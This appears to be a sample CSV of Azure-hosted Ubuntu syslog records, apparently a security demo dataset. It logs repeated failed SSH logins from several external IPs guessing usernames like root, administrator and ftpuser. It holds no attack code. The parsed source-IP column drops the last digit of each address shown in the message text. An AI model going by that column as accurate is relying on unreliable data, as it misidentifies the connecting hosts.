+6503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:38,UbuntuDevEnv,2019-06-26 16:57:37,auth,UbuntuDevEnv,info,Invalid user martin from 74.94.246.82 port 40328,42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martin,74.94.246.8,40328,,
+6504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:38,UbuntuDevEnv,2019-06-26 16:57:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:38,UbuntuDevEnv,2019-06-26 16:57:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:39,UbuntuDevEnv,2019-06-26 16:57:39,auth,UbuntuDevEnv,info,Failed password for invalid user martin from 74.94.246.82 port 40328 ssh2,42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martin,74.94.246.8,40328,,
+6507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:40,UbuntuDevEnv,2019-06-26 16:57:39,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 40328:11: Bye Bye [preauth],42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,40328,,
+6508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:40,UbuntuDevEnv,2019-06-26 16:57:39,auth,UbuntuDevEnv,info,Disconnected from invalid user martin 74.94.246.82 port 40328 [preauth],42937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martin,74.94.246.8,40328,,
+6509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:00,UbuntuDevEnv,2019-06-26 16:58:00,auth,UbuntuDevEnv,info,Invalid user nathaniel from 81.0.212.18 port 49072,43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathaniel,81.0.212.1,49072,,
+6510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:00,UbuntuDevEnv,2019-06-26 16:58:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:00,UbuntuDevEnv,2019-06-26 16:58:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:01,auth,UbuntuDevEnv,info,Invalid user ftpuser from 35.154.19.93 port 48068,43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,48068,,
+6513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:02,auth,UbuntuDevEnv,info,Failed password for invalid user nathaniel from 81.0.212.18 port 49072 ssh2,43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathaniel,81.0.212.1,49072,,
+6516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:02,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 49072:11: Bye Bye [preauth],43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,49072,,
+6517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:02,UbuntuDevEnv,2019-06-26 16:58:02,auth,UbuntuDevEnv,info,Disconnected from invalid user nathaniel 81.0.212.18 port 49072 [preauth],43017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathaniel,81.0.212.1,49072,,
+6518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:04,UbuntuDevEnv,2019-06-26 16:58:03,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 35.154.19.93 port 48068 ssh2,43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,48068,,
+6519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:04,UbuntuDevEnv,2019-06-26 16:58:03,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 48068:11: Normal Shutdown, Thank you for playing [preauth]",43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,48068,,
+6520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:04,UbuntuDevEnv,2019-06-26 16:58:03,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 35.154.19.93 port 48068 [preauth],43020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,48068,,
+6521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:36,UbuntuDevEnv,2019-06-26 16:58:36,auth,UbuntuDevEnv,info,Invalid user ftpuser from 35.154.19.93 port 51352,43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,51352,,
+6522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:36,UbuntuDevEnv,2019-06-26 16:58:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:36,UbuntuDevEnv,2019-06-26 16:58:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:38,UbuntuDevEnv,2019-06-26 16:58:37,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 35.154.19.93 port 51352 ssh2,43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,51352,,
+6525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:38,UbuntuDevEnv,2019-06-26 16:58:38,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 51352:11: Normal Shutdown, Thank you for playing [preauth]",43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51352,,
+6526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:58:38,UbuntuDevEnv,2019-06-26 16:58:38,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 35.154.19.93 port 51352 [preauth],43137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,35.154.19.9,51352,,
+6527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:06,UbuntuDevEnv,2019-06-26 16:59:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82  user=root,43252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,74.94.246.8,,0,
+6528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:07,UbuntuDevEnv,2019-06-26 16:59:06,auth,UbuntuDevEnv,info,Invalid user demo from 171.8.199.77 port 32886,43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,171.8.199.7,32886,,
+6529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:07,UbuntuDevEnv,2019-06-26 16:59:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:07,UbuntuDevEnv,2019-06-26 16:59:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:07,auth,UbuntuDevEnv,info,Failed password for root from 74.94.246.82 port 57522 ssh2,43252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,57522,,
+6532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:07,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 74.94.246.82 port 57522 [preauth],43252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,74.94.246.8,57522,,
+6533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:07,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 57522:11: Bye Bye [preauth],43252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,57522,,
+6534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:08,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 171.8.199.77 port 32886 ssh2,43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,171.8.199.7,32886,,
+6535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:08,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 171.8.199.77 port 32886 [preauth],43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,171.8.199.7,32886,,
+6536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:08,UbuntuDevEnv,2019-06-26 16:59:08,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 32886:11: Bye Bye [preauth],43243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,32886,,
+6537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:09,UbuntuDevEnv,2019-06-26 16:59:09,auth,UbuntuDevEnv,info,Invalid user administrator from 35.154.19.93 port 54658,43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,54658,,
+6538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:09,UbuntuDevEnv,2019-06-26 16:59:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:09,UbuntuDevEnv,2019-06-26 16:59:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:11,UbuntuDevEnv,2019-06-26 16:59:11,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 35.154.19.93 port 54658 ssh2,43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,54658,,
+6541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:12,UbuntuDevEnv,2019-06-26 16:59:11,auth,UbuntuDevEnv,info,Disconnected from invalid user administrator 35.154.19.93 port 54658 [preauth],43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,54658,,
+6542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:12,UbuntuDevEnv,2019-06-26 16:59:11,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 54658:11: Normal Shutdown, Thank you for playing [preauth]",43265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54658,,
+6543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:32,UbuntuDevEnv,2019-06-26 16:59:32,auth,UbuntuDevEnv,info,Invalid user carter from 81.0.212.18 port 58406,43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carter,81.0.212.1,58406,,
+6544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:32,UbuntuDevEnv,2019-06-26 16:59:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:32,UbuntuDevEnv,2019-06-26 16:59:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:35,UbuntuDevEnv,2019-06-26 16:59:34,auth,UbuntuDevEnv,info,Failed password for invalid user carter from 81.0.212.18 port 58406 ssh2,43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carter,81.0.212.1,58406,,
+6547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:35,UbuntuDevEnv,2019-06-26 16:59:34,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 58406:11: Bye Bye [preauth],43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,58406,,
+6548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:35,UbuntuDevEnv,2019-06-26 16:59:34,auth,UbuntuDevEnv,info,Disconnected from invalid user carter 81.0.212.18 port 58406 [preauth],43351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carter,81.0.212.1,58406,,
+6549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:41,UbuntuDevEnv,2019-06-26 16:59:41,auth,UbuntuDevEnv,info,Invalid user administrator from 35.154.19.93 port 57950,43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,57950,,
+6550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:41,UbuntuDevEnv,2019-06-26 16:59:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:41,UbuntuDevEnv,2019-06-26 16:59:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:43,UbuntuDevEnv,2019-06-26 16:59:42,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 35.154.19.93 port 57950 ssh2,43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,57950,,
+6553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:43,UbuntuDevEnv,2019-06-26 16:59:42,auth,UbuntuDevEnv,info,Disconnected from invalid user administrator 35.154.19.93 port 57950 [preauth],43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,35.154.19.9,57950,,
+6554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:59:43,UbuntuDevEnv,2019-06-26 16:59:42,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 57950:11: Normal Shutdown, Thank you for playing [preauth]",43383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57950,,
+6555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:10,UbuntuDevEnv,2019-06-26 17:00:09,auth,UbuntuDevEnv,info,Invalid user a from 35.154.19.93 port 33006,43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,35.154.19.9,33006,,
+6556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:10,UbuntuDevEnv,2019-06-26 17:00:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:10,UbuntuDevEnv,2019-06-26 17:00:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:12,UbuntuDevEnv,2019-06-26 17:00:12,auth,UbuntuDevEnv,info,Failed password for invalid user a from 35.154.19.93 port 33006 ssh2,43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,35.154.19.9,33006,,
+6559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:12,UbuntuDevEnv,2019-06-26 17:00:12,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 33006:11: Normal Shutdown, Thank you for playing [preauth]",43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33006,,
+6560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:12,UbuntuDevEnv,2019-06-26 17:00:12,auth,UbuntuDevEnv,info,Disconnected from invalid user a 35.154.19.93 port 33006 [preauth],43514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,35.154.19.9,33006,,
+6561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:17,UbuntuDevEnv,2019-06-26 17:00:16,auth,UbuntuDevEnv,info,Invalid user b from 35.154.19.93 port 36302,43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,35.154.19.9,36302,,
